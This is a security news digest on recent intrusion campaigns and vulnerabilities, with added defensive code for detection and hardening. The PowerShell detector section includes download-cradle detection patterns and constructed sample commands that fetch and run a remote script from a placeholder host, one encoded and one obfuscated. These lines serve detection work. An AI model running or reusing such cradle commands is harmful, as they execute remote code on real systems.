UNC1549 Hacks Telecom Firms Across Europe Via Recruitment-Themed LinkedIn Attacks
UNC1549, an Iran-nexus cyber espionage group, recently targeted 11 European telecommunications companies and successfully compromised 34 devices. Researchers attribute the campaign to the Subtle Snail cluster, characterized by well-engineered LinkedIn job lures and custom malware deployments.
Attack Vector: Social Engineering via LinkedIn
The campaign used fake recruitment offers circulated on LinkedIn to draw telecom employees into engaging with malicious content. Once an employee took the bait, the attackers deployed the MINIBIKE malware, which evaded detection by masquerading as legitimate applications and by delivering its payload in encrypted form. The malware then established persistent remote access on the compromised endpoints.
Malware Details: MINIBIKE Characteristics
MINIBIKE uses modular plugins tailored to the victim’s infrastructure, with capabilities including credential harvesting, lateral movement, and network reconnaissance. Its loader checks system fingerprints to avoid automated analysis and ensures payload delivery only on targeted devices. The group maintained command-and-control infrastructure using rotating relay servers to mitigate takedown risk.
Implications and Attribution
The affected organizations faced risks of exfiltration of sensitive internal data, operational disruption, and exploitation of telecom systems for further global espionage objectives. UNC1549 tactics align with previous activities attributed to Iran’s Islamic Revolutionary Guard Corps, indicating persistent multi-year targeting of European critical infrastructure.
REM Proxy Botnet Leverages SystemBC Malware to Power Criminal Proxy Services
A botnet known as REM Proxy has grown to control roughly 1,500 victim VPS systems per day and some 20,000 MikroTik routers worldwide, which it rents out as a criminal proxy network. An investigation found that the SystemBC malware underpins this infrastructure.
Technical Breakdown: SystemBC Deployment
SystemBC, a versatile proxy malware, is planted on vulnerable internet-facing VPS servers through automated exploitation. Once installed it connects to one of roughly 80 command-and-control servers, encrypts its traffic, and relays customers' web requests through the infected host. Fraudsters use this to hide their origin while performing credential theft, financial scams, or follow-on intrusions.
Network Infrastructure and Operational Scale
REM Proxy markets itself by listing thousands of operational routers and VPS systems, providing access to high-speed global endpoints with minimal geographic restrictions. Most of the infrastructure is orchestrated using cloud-based control panels and dynamic DNS techniques to continuously reassign compromised assets.
Mitigation Efforts and Risks
Security teams recommend monitoring for anomalous encrypted outbound connections to known C2 servers, blocking abusive VPS address ranges, and patching or replacing vulnerable MikroTik devices. The scale of REM Proxy makes both conventional detection and ISP-level blocking difficult, and a source address belonging to an ordinary VPS or home router should not by itself be treated as trustworthy.
TA558 Uses AI-Generated Phishing Scripts to Deploy Venom RAT in Brazilian Hospitality Attacks
TA558, an actor previously observed in Latin American cybercrime, has adopted AI-driven automation to scale its spear phishing campaigns against hotels in Brazil and adjacent Spanish-speaking markets. These attacks delivered a new variant of Venom RAT, a remote access trojan that gives the operator full control of an infected host.
AI Scripting and Malicious Payload Evolution
TA558 used generative AI tools to produce the loader scripts and invoice-themed phishing emails, varying the content from message to message to slip past local spam filters and raise engagement. The embedded scripts launched obfuscated PowerShell payloads that installed Venom RAT, giving the attackers persistent control with webcam capture, keystroke logging, and credential harvesting.
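The obfuscated PowerShell stage is the part of this chain a defender can catch in process-creation telemetry. The following is an added example for this digest, not code from the report on TA558: it takes command lines of the kind an EDR or Sysmon event 1 records, decodes any -EncodedCommand payload (base64 of UTF-16LE text), undoes two cheap obfuscations (string splitting with '+' and stray backticks) and flags download-cradle keywords. The sample log lines are constructed, and the pattern list is a starting point rather than a complete rule set.

```python
"""Flag encoded or obfuscated PowerShell download cradles in process command-line logs.

Added example for this digest; not code from the TA558 report. The log lines are
constructed, and the pattern list is a starting point, not a full rule set.
"""
import base64
import binascii
import re

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# Backtick escapes that carry meaning inside PowerShell strings; any other backtick
# is noise inserted to break signatures (Inv`oke-Ex`pression).
PS_ESCAPES = "ntrabfv0eu"
CRADLE_PATTERNS = [
    ("download_cradle", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|invoke-restmethod|net\.webclient|\biwr\b")),
    ("invoke_expression", re.compile(r"invoke-expression|\biex\b")),
    ("base64_decode", re.compile(r"frombase64string")),
]


def normalize(text: str) -> str:
    """Undo cheap obfuscation so keyword matching sees the intended token."""
    text = re.sub(r"['\"]\s*\+\s*['\"]", "", text)            # 'Down'+'loadString'
    text = re.sub(r"`(?![" + PS_ESCAPES + "])", "", text)    # Inv`oke -> Invoke
    return text.lower()


def decode_encoded_command(b64: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return None if it is not that."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def analyze_line(line: str) -> dict:
    """Return the findings for one command line, including the decoded payload if any."""
    findings, decoded = [], None
    m = ENCODED_RE.search(line)
    if m:
        findings.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
    if HIDDEN_RE.search(line):
        findings.append("hidden_window")
    text = normalize(line + " " + (decoded or ""))
    findings += [name for name, rx in CRADLE_PATTERNS if rx.search(text)]
    suspicious = "download_cradle" in findings or len(findings) >= 2
    return {"line": line, "decoded": decoded, "findings": findings, "suspicious": suspicious}


def _encode(ps: str) -> str:
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample command lines (not real telemetry).
SAMPLE_LOGS = [
    'powershell.exe -NoProfile -Command "Get-Service Spooler"',
    "powershell.exe -w hidden -enc " + _encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/i.ps1')"),
    "powershell -w hidden -c \"Inv`oke-Ex`pression "
    "(New-Object Net.WebClient).('Down'+'loadString')('http://example.invalid/x')\"",
]

if __name__ == "__main__":
    for result in map(analyze_line, SAMPLE_LOGS):
        print(result["suspicious"], result["findings"])
```

Run it against exported command lines from your own telemetry; the decoded payload in the result is what an analyst needs to see, since the base64 blob alone tells you nothing about what the loader fetched.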
Timeline and Technical Sophistication
The attacks ran through the summer of 2025, exploiting outdated email infrastructure and weak endpoint protection. The Venom RAT variant used encrypted command-and-control channels and re-packaged, reused code to avoid signature-based antivirus detection while exfiltrating proprietary hotel, guest, and payment data to offshore servers.
Industry Impact
The incidents highlight rising risks in hospitality, as attackers automate campaign development and payload delivery. Researchers recommend upgraded mail gateway controls, end-user security training, and rapid incident detection to counter evolving AI-assisted threat tactics.
Chaos Mesh GraphQL Vulnerabilities Enable Remote Code Execution and Kubernetes Cluster Takeover
Multiple critical vulnerabilities have been disclosed in Chaos Mesh, a popular Kubernetes fault injection tool, allowing an attacker who can reach its GraphQL API from inside the cluster to achieve full cluster takeover. Because exploitation needs only in-cluster network access rather than credentials, the flaws pose a broad risk to cloud infrastructure deployments.
Vulnerability Details and RCE Pathways
The flaws reside in the GraphQL query-handling routines, which lack adequate input validation and authentication. Attackers can submit crafted GraphQL requests to achieve remote code execution, corrupt data, kill Kubernetes pods, or disrupt service mesh communication. Some of the vulnerabilities allow escalation from basic user access to full cluster admin.
Attack Vectors and Real-World Impact
In production environments, merely having in-cluster connectivity—for example, via a misconfigured sidecar or compromised internal service—permits exploitation. Large-scale cloud providers and managed Kubernetes services running Chaos Mesh are advised to isolate fault injection controls and patch affected API endpoints immediately.
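In-cluster connectivity is enough because Kubernetes networking is allow-all until a NetworkPolicy selects a pod, and "isolate fault injection controls" means making sure one actually does. The function below is an added example for this digest, not Chaos Mesh or advisory code: it evaluates NetworkPolicy objects shaped like kubectl -o json output with the real selection semantics (empty podSelector matches everything, policyTypes defaults, named ports, empty from meaning all sources) and reports whether a given port on a pod is reachable cluster-wide. The sample pod labels and the controller port (10082 for the controller-manager's ctrl/GraphQL listener) are assumptions to verify against the chart you deployed.

```python
"""Decide whether a pod port is reachable from anywhere in the cluster under Kubernetes
NetworkPolicy semantics.

Added example for this digest, not code from Chaos Mesh or the advisory. Policy objects
are shaped like `kubectl get networkpolicy -o json`; the sample labels and port 10082
are assumptions to be checked against the deployed chart.
"""


def selector_matches(selector: dict, labels: dict) -> bool:
    """LabelSelector evaluation; an empty selector ({}) matches every pod."""
    for key, value in (selector.get("matchLabels") or {}).items():
        if labels.get(key) != value:
            return False
    for expr in selector.get("matchExpressions") or []:
        key, op, values = expr["key"], expr["operator"], expr.get("values") or []
        present = key in labels
        if op == "In" and not (present and labels[key] in values):
            return False
        if op == "NotIn" and present and labels[key] in values:
            return False
        if op == "Exists" and not present:
            return False
        if op == "DoesNotExist" and present:
            return False
    return True


def policy_types(policy: dict) -> set:
    """policyTypes default: Ingress always applies; Egress only if an egress section exists."""
    spec = policy["spec"]
    if "policyTypes" in spec:
        return set(spec["policyTypes"])
    return {"Ingress", "Egress"} if "egress" in spec else {"Ingress"}


def port_matches(rule_port: dict, port: int, protocol: str, named_ports: dict) -> bool:
    """NetworkPolicyPort: numeric or named port, optional endPort range, protocol defaults to TCP."""
    if rule_port.get("protocol", "TCP") != protocol:
        return False
    start = rule_port.get("port")
    if start is None:
        return True
    if isinstance(start, str):
        start = named_ports.get(start)
        if start is None:
            return False
    return start <= port <= rule_port.get("endPort", start)


def ingress_exposure(pod: dict, policies: list, port: int, protocol: str = "TCP") -> dict:
    """Report whether the pod is isolated for ingress and, if so, which peers may reach the port."""
    selecting = [
        p for p in policies
        if p["metadata"]["namespace"] == pod["namespace"]
        and "Ingress" in policy_types(p)
        and selector_matches(p["spec"].get("podSelector") or {}, pod["labels"])
    ]
    if not selecting:  # no policy selects the pod: Kubernetes default is allow-all
        return {"isolated": False, "open_to_all": True, "peers": []}
    peers, open_to_all = [], False
    for policy in selecting:
        for rule in policy["spec"].get("ingress") or []:
            ports = rule.get("ports")
            if ports and not any(port_matches(rp, port, protocol, pod.get("named_ports", {}))
                                 for rp in ports):
                continue
            sources = rule.get("from")
            if not sources:  # empty or missing 'from' means all sources
                open_to_all = True
            else:
                peers.extend(sources)
    return {"isolated": True, "open_to_all": open_to_all, "peers": peers}


# Constructed objects; the labels, namespace and port are assumptions for the example.
CONTROLLER_POD = {"namespace": "chaos-mesh",
                  "labels": {"app.kubernetes.io/component": "controller-manager"}}
GRAPHQL_PORT = 10082
DEFAULT_DENY = {"metadata": {"namespace": "chaos-mesh", "name": "default-deny-ingress"},
                "spec": {"podSelector": {}, "policyTypes": ["Ingress"]}}
ALLOW_ADMIN_ONLY = {
    "metadata": {"namespace": "chaos-mesh", "name": "controller-from-chaos-admin"},
    "spec": {"podSelector": {"matchLabels": {"app.kubernetes.io/component": "controller-manager"}},
             "policyTypes": ["Ingress"],
             "ingress": [{"from": [{"podSelector": {"matchLabels": {"role": "chaos-admin"}}}],
                          "ports": [{"port": GRAPHQL_PORT, "protocol": "TCP"}]}]}}

if __name__ == "__main__":
    print("no policies:", ingress_exposure(CONTROLLER_POD, [], GRAPHQL_PORT))
    print("isolated:   ", ingress_exposure(CONTROLLER_POD, [DEFAULT_DENY, ALLOW_ADMIN_ONLY], GRAPHQL_PORT))
```

The first call is the state most clusters are in: no policy selects the controller pod, so every pod in the cluster can reach the GraphQL port. The second shows the minimal pair, a namespace-wide default deny plus an explicit allow for whatever client you actually use. A CNI that does not enforce NetworkPolicy makes both results meaningless, so confirm enforcement before relying on this.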
SlopAds Ad Fraud Operation Exploits 224 Android Apps, Generates Billions of Fake Ad Bids Daily
The SlopAds fraud ring has orchestrated a large-scale click fraud and ad impression scam, leveraging 224 legitimate-appearing Android applications installed by 38 million users across 228 countries. These apps covertly generate 2.3 billion fraudulent ad bids every day.
Fraud Mechanism: Steganography and Hidden WebViews
SlopAds payloads use steganography, hiding the fraud module as executable code inside image files. Once launched, the module opens hidden WebViews that load ad content and simulate clicks and impressions without the user's knowledge. The traffic is directed to actor-controlled cashout sites, monetizing the fake engagement.
Detection, Take-Down, and Industry Response
Threat intelligence teams spotted the suspicious ad network traffic and traced it to coordinated clusters of apps. App stores removed the apps, but the operation keeps adapting by publishing new releases and updating payloads. Advertisers bear the cost through wasted spend and degraded campaign data.
Apple Warns French Users of New Spyware Campaign; CERT-FR Affirms Persistent Threat
Apple has issued its fourth warning this year to users in France regarding a targeted spyware campaign, as confirmed by the Computer Emergency Response Team of France (CERT-FR). Recent alerts indicate ongoing nation-state surveillance of iOS devices linked to French iCloud accounts.
Spyware Delivery and Targeting
The attacks reportedly use zero-day exploits to install advanced surveillance malware remotely on targeted devices. Infection vectors include malicious iMessage payloads and exploit chains aimed at high-value targets such as journalists and government employees. Apple's threat notifications warn affected users quickly and push them to update their devices without delay.
Threat Actor Attribution and Response
Multiple intelligence sources suggest involvement by state-sponsored groups; CERT-FR continues forensic analysis and incident response coordination. Apple recommends prompt OS updates and enhanced account security measures.
New HybridPetya Ransomware Bypasses UEFI Secure Boot via CVE-2024-7344 Exploit
HybridPetya, a newly discovered ransomware variant, combines features of the earlier Petya and NotPetya malware with the ability to bypass UEFI Secure Boot on Windows systems by exploiting CVE-2024-7344.
Vulnerability Exploitation and Deployment
The bypass lets the attackers install a malicious UEFI bootloader that runs before Windows starts, giving the ransomware raw access to the disk to encrypt it and hold it for ransom. Delivery can be targeted at enterprises or opportunistic, for example via phishing. The technique works on any machine whose firmware still trusts the vulnerable signed component, that is, one that has not received the Secure Boot revocation (dbx) update that blocks it, regardless of how current its Windows patches are.
Technical and Prevention Details
This variant encrypts the system, disables recovery options, and deletes shadow copies, preventing easy restoration. Security teams should verify that all devices carry the latest UEFI firmware and OS patches, including the Secure Boot revocation (dbx) update for CVE-2024-7344, monitor for raw disk writes and for changes to the EFI System Partition, and maintain offline backups.
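Checking that the revocation actually landed means reading the dbx variable and looking for the revoked hash, since a Windows patch level alone does not prove the firmware applied it. The code below is an added example for this digest, not ESET's or Microsoft's: it parses a dbx blob as the stream of EFI_SIGNATURE_LIST structures the UEFI specification defines and answers whether a given Authenticode SHA-256 hash is present. The hashes it uses are constructed placeholders, not the real revocation entries for CVE-2024-7344; the efivarfs path and the Windows cmdlet named in the helper are the standard ways to obtain the blob.

```python
"""Parse a UEFI Secure Boot dbx blob (a stream of EFI_SIGNATURE_LIST structures) and
check whether a given Authenticode SHA-256 hash is revoked.

Added example for this digest, not ESET's or Microsoft's code. The layout comes from the
UEFI specification; the hashes below are constructed placeholders, not the real
revocation entries for CVE-2024-7344.
"""
import hashlib
import struct
import uuid

EFI_CERT_SHA256_GUID = uuid.UUID("c1c41626-504c-4092-aca9-41f936934328")
HEADER_LEN = 28  # EFI_GUID(16) + SignatureListSize(4) + SignatureHeaderSize(4) + SignatureSize(4)


def parse_signature_lists(blob: bytes):
    """Yield (signature_type, owner_guid, signature_data) for every entry in the blob."""
    off = 0
    while off < len(blob):
        if len(blob) - off < HEADER_LEN:
            raise ValueError("truncated EFI_SIGNATURE_LIST header")
        sig_type = uuid.UUID(bytes_le=blob[off:off + 16])
        list_size, hdr_size, sig_size = struct.unpack_from("<III", blob, off + 16)
        if list_size < HEADER_LEN + hdr_size or off + list_size > len(blob):
            raise ValueError("SignatureListSize out of range")
        body = blob[off + HEADER_LEN + hdr_size: off + list_size]
        if sig_size < 16 or len(body) % sig_size:
            raise ValueError("SignatureSize does not divide the list body")
        for i in range(0, len(body), sig_size):
            entry = body[i:i + sig_size]          # EFI_SIGNATURE_DATA: owner GUID + data
            yield sig_type, uuid.UUID(bytes_le=entry[:16]), entry[16:]
        off += list_size


def revoked_hashes(blob: bytes) -> set:
    """All SHA-256 entries. dbx stores the Authenticode (PE image) hash, not the flat file hash."""
    return {data for sig_type, _, data in parse_signature_lists(blob)
            if sig_type == EFI_CERT_SHA256_GUID}


def is_revoked(blob: bytes, authenticode_sha256: bytes) -> bool:
    return authenticode_sha256 in revoked_hashes(blob)


def load_efivar(path: str) -> bytes:
    """Read a variable from Linux efivarfs, whose files start with a 4-byte attributes word.
    dbx lives at /sys/firmware/efi/efivars/dbx-d719b2cb-3d3a-4596-a3bc-dad00e67656f;
    on Windows, Get-SecureBootUEFI -Name dbx returns the same bytes without that prefix."""
    with open(path, "rb") as fh:
        return fh.read()[4:]


def build_sha256_list(hashes, owner: uuid.UUID = uuid.UUID(int=0)) -> bytes:
    """Encode hashes as one EFI_SIGNATURE_LIST (used here only to construct sample data)."""
    sig_size = 16 + 32
    header = EFI_CERT_SHA256_GUID.bytes_le + struct.pack(
        "<III", HEADER_LEN + sig_size * len(hashes), 0, sig_size)
    return header + b"".join(owner.bytes_le + h for h in hashes)


# Constructed revocation entries (placeholders, not real dbx content).
REVOKED_A = hashlib.sha256(b"constructed: revoked loader A").digest()
REVOKED_B = hashlib.sha256(b"constructed: revoked loader B").digest()
REVOKED_C = hashlib.sha256(b"constructed: revoked loader C").digest()
CLEAN = hashlib.sha256(b"constructed: clean loader").digest()
SAMPLE_DBX = build_sha256_list([REVOKED_A, REVOKED_B]) + build_sha256_list([REVOKED_C])

if __name__ == "__main__":
    print(len(revoked_hashes(SAMPLE_DBX)), "revoked hashes in sample dbx")
    print("loader A revoked:", is_revoked(SAMPLE_DBX, REVOKED_A))
    print("clean loader revoked:", is_revoked(SAMPLE_DBX, CLEAN))
```

Feed the real dbx through load_efivar (or the Windows cmdlet) and the Authenticode hash of the binary you care about; a machine that reports the hash as absent has not applied the revocation, whatever its Windows Update status says. Real dbx blobs also contain X.509 and SHA-1 lists, which the parser walks over without error and revoked_hashes ignores.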
Critical CVE-2025-5086 DELMIA Apriso Vulnerability Actively Exploited
CVE-2025-5086, a critical vulnerability in DELMIA Apriso manufacturing execution systems, is under active exploitation. CISA has added it to its Known Exploited Vulnerabilities catalog and issued guidance calling for immediate mitigation.
Technical Details and Observed Attacks
The flaw is a deserialization of untrusted data issue that lets remote, unauthenticated attackers execute arbitrary code on the Apriso server. Exploitation attempts against exposed instances have been observed, putting manufacturing networks at risk of production disruption and data theft.
Mitigation and Industry Impact
Organizations must apply the vendor's fix, keep the Apriso web interface off the public internet, and monitor for anomalous activity. The attacks highlight the ongoing risk to operational technology in large-scale industrial sectors.
Jaguar Land Rover Extends Production Delay After Major Cyberattack
Jaguar Land Rover has announced further production delays following a significant cyberattack claimed by a hacker group known for sophisticated social engineering tactics. The incident disrupted critical manufacturing processes at multiple locations and triggered a broader investigation.
Attack Methods and Impact
Early reporting describes an initial compromise through targeted phishing followed by lateral movement across interconnected networks. JLR shut down affected IT systems to contain the intrusion, which halted assembly lines. Forensic review is ongoing, and restoring data integrity remains a priority.
Industry Response
Automotive firms are updating incident response protocols and sharing indicator lists with industry peers. Work continues on restoring affected systems and enhancing security controls against future threats.
FBI Warns of Two Active Targeted Campaigns Against Salesforce Instances
The FBI has issued a warning regarding two ongoing campaigns by UNC6040 and UNC6395 aimed at exploiting Salesforce cloud environments. These campaigns involve diverse tactics to gain unauthorized access to enterprise customer data.
Technical Tactics and Data Exfiltration
UNC6040 relies on voice phishing: employees are talked into authorizing a malicious connected app (a modified version of Salesforce's Data Loader), which grants the attacker broad API access to business data. UNC6395 uses stolen OAuth access tokens, notably those taken in the Salesloft Drift compromise, to query Salesforce directly through the API without ever touching a login prompt. Both campaigns have led to exfiltration of sensitive CRM and sales data.
Defensive Recommendations
Customers should enforce strong MFA, review OAuth consent grants and session logs, restrict which third-party apps can be authorized, and revoke tokens for any integration they do not recognize. The warning underscores the importance of cloud configuration hygiene and continuous monitoring.
VoidProxy Phishing-as-a-Service Platform Bypasses Multi-Factor Authentication Defenses
Security researchers have identified VoidProxy, a phishing-as-a-service platform that defeats multi-factor authentication for Microsoft and Google accounts. The service uses adversary-in-the-middle (AitM) reverse-proxy techniques to capture and replay sessions, threatening business email security and enabling credential theft.
Technical Mechanism and Evolution
The service relays the genuine login pages and authentication prompts through an adversary-controlled server, capturing the user's credentials, the one-time MFA code, and the session cookie issued after a successful login. Attackers can then use the victim's account immediately to conduct business email compromise or data exfiltration.
Mitigation Steps
Researchers recommend phishing-resistant authentication (FIDO2/WebAuthn security keys or passkeys) rather than one-time-code MFA, which the proxy simply captures and replays, together with user awareness campaigns. Organizations should also check sign-in telemetry for sessions originating from proxy infrastructure and investigate anomalous access events.
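The reason a security key survives the relay while a one-time code does not is visible in two server-side checks, and the simulation below makes them concrete. It is an added example for this digest, not VoidProxy code or any vendor's implementation: a relying party issues a challenge, the browser (not the page) writes the page's origin into clientDataJSON and refuses an rpId that is not a suffix of the page's host, and the relying party rejects anything whose origin is not its own. The same proxy relaying a TOTP code succeeds, because nothing in the code says where it was typed. Origins are placeholders; the TOTP routine follows RFC 6238, and signature verification over the assertion is omitted because it is not the property under discussion.

```python
"""Why an AitM reverse-proxy phishing kit can replay a one-time code but not a WebAuthn
assertion. Added example for this digest, not VoidProxy code or a vendor implementation.
Relying party, browser/authenticator and proxy are simulated; origins are placeholders.
Signature verification is omitted; the checks shown are what make the protocol
phishing-resistant."""
import base64
import hashlib
import hmac
import json
import secrets
import struct

RP_ORIGIN = "https://login.example.com"             # assumed legitimate origin
PHISH_ORIGIN = "https://login.example-com.invalid"  # assumed proxy domain


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


class RelyingParty:
    """Server side. Each login gets a fresh challenge; the assertion must quote it and our origin."""

    def __init__(self, origin: str):
        self.origin = origin
        self.rp_id = origin.split("://", 1)[1]
        self.pending = {}  # challenge -> username

    def begin_login(self, username: str) -> str:
        challenge = b64url(secrets.token_bytes(32))
        self.pending[challenge] = username
        return challenge

    def finish_login(self, username: str, client_data_json: bytes, authenticator_data: bytes):
        cd = json.loads(client_data_json)
        if cd.get("type") != "webauthn.get":
            return False, "wrong ceremony type"
        if self.pending.pop(cd.get("challenge"), None) != username:
            return False, "unknown or already-used challenge"
        if cd.get("origin") != self.origin:
            return False, "origin mismatch: " + str(cd.get("origin"))
        if authenticator_data[:32] != hashlib.sha256(self.rp_id.encode()).digest():
            return False, "rpIdHash mismatch"
        # A real RP now verifies the signature over authenticatorData || SHA-256(clientDataJSON)
        # with the registered public key, which binds the fields checked above to the key.
        return True, "ok"


def browser_get_assertion(page_origin: str, challenge: str, rp_id: str):
    """Simulated navigator.credentials.get(): the browser, not the page, writes the origin
    into clientDataJSON and rejects an rpId that is not a registrable suffix of the page host."""
    host = page_origin.split("://", 1)[1]
    if host != rp_id and not host.endswith("." + rp_id):
        raise ValueError("SecurityError: rpId %r is not valid for %s" % (rp_id, page_origin))
    client_data = json.dumps(
        {"type": "webauthn.get", "challenge": challenge, "origin": page_origin}).encode()
    flags, counter = b"\x05", b"\x00\x00\x00\x01"  # UP|UV flags, signature counter
    return client_data, hashlib.sha256(rp_id.encode()).digest() + flags + counter


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP with HMAC-SHA1 and RFC 4226 dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", unix_time // step), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)


def legitimate_webauthn_login(rp: RelyingParty):
    challenge = rp.begin_login("alice")
    return rp.finish_login("alice", *browser_get_assertion(rp.origin, challenge, rp.rp_id))


def proxied_webauthn_login(rp: RelyingParty, rp_id_requested: str = None):
    """The proxy fetches a real challenge and relays it to the victim on the phishing origin.
    With the real rpId the browser refuses outright; with the proxy's own host as rpId the
    browser cooperates (ignoring that no credential exists for it) but the RP rejects the origin."""
    challenge = rp.begin_login("alice")
    try:
        cd, ad = browser_get_assertion(PHISH_ORIGIN, challenge, rp_id_requested or rp.rp_id)
    except ValueError as err:
        return False, str(err)
    return rp.finish_login("alice", cd, ad)  # the attacker can only relay what the browser produced


def proxied_totp_login(secret: bytes, unix_time: int) -> bool:
    """The victim types the code into the proxy page; the proxy forwards the same string.
    Nothing in a TOTP code identifies where it was typed, so the RP accepts it."""
    typed_by_victim = totp(secret, unix_time)
    relayed_by_proxy = typed_by_victim
    return hmac.compare_digest(relayed_by_proxy, totp(secret, unix_time))


if __name__ == "__main__":
    rp = RelyingParty(RP_ORIGIN)
    print("direct WebAuthn:      ", legitimate_webauthn_login(rp))
    print("proxied, real rpId:   ", proxied_webauthn_login(rp))
    print("proxied, proxy rpId:  ", proxied_webauthn_login(rp, "login.example-com.invalid"))
    print("proxied TOTP accepted:", proxied_totp_login(b"12345678901234567890", 59))
```

The challenge is consumed on first use, so even a captured assertion cannot be replayed later; the origin and rpIdHash checks are what stop it being usable in the first place. A push or code-based authenticator app has neither property, which is why the mitigation above names phishing-resistant methods specifically.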
Palo Alto Networks and Zscaler Customers Derailed by Salesloft Drift-Linked Supply Chain Attack
Cybersecurity firms Palo Alto Networks and Zscaler have disclosed that customer data held in their Salesforce instances was exposed in a broad supply chain attack involving OAuth tokens stolen from Salesloft Drift. Reports indicate hundreds of downstream organizations that used the Drift integration were affected.
Attack Vector and Discovery
Reports trace the campaign to a compromise of Salesloft's GitHub account, from which the attacker reached the Drift environment and obtained the OAuth tokens Drift held for customers' Salesforce and other SaaS integrations. Those tokens were then used to query customer data directly through the APIs. Because the activity came from an already-authorized integration, downstream victims saw no malware or login anomalies, only unusual API queries.
Mitigation and Current Status
Affected firms are resetting credentials, revoking and rotating tokens for third-party integrations, and reviewing the permissions granted to connected apps. Customers are advised to watch for unusual API activity from integrations and to tighten their authorization workflows.
Fortra Releases Critical Patch for CVSS 10.0 Vulnerability in GoAnywhere MFT
Fortra has addressed a critical remote code execution vulnerability, rated CVSS 10.0, in its GoAnywhere Managed File Transfer product. The flaw allows attackers to take complete control of a file transfer server.
Vulnerability Details and Exploitation
The flaw is a deserialization vulnerability in the License Servlet of the admin console: a crafted request causes the server to deserialize an attacker-controlled object, leading to command execution without a valid login. Attackers could install backdoors, exfiltrate files, and change administrative settings. Immediate patching is essential for all affected systems.
Security Recommendations
System administrators should deploy the released patch, ensure the admin console is not reachable from the public internet, audit logs for suspicious activity, and segment the network to limit the blast radius of future exploits.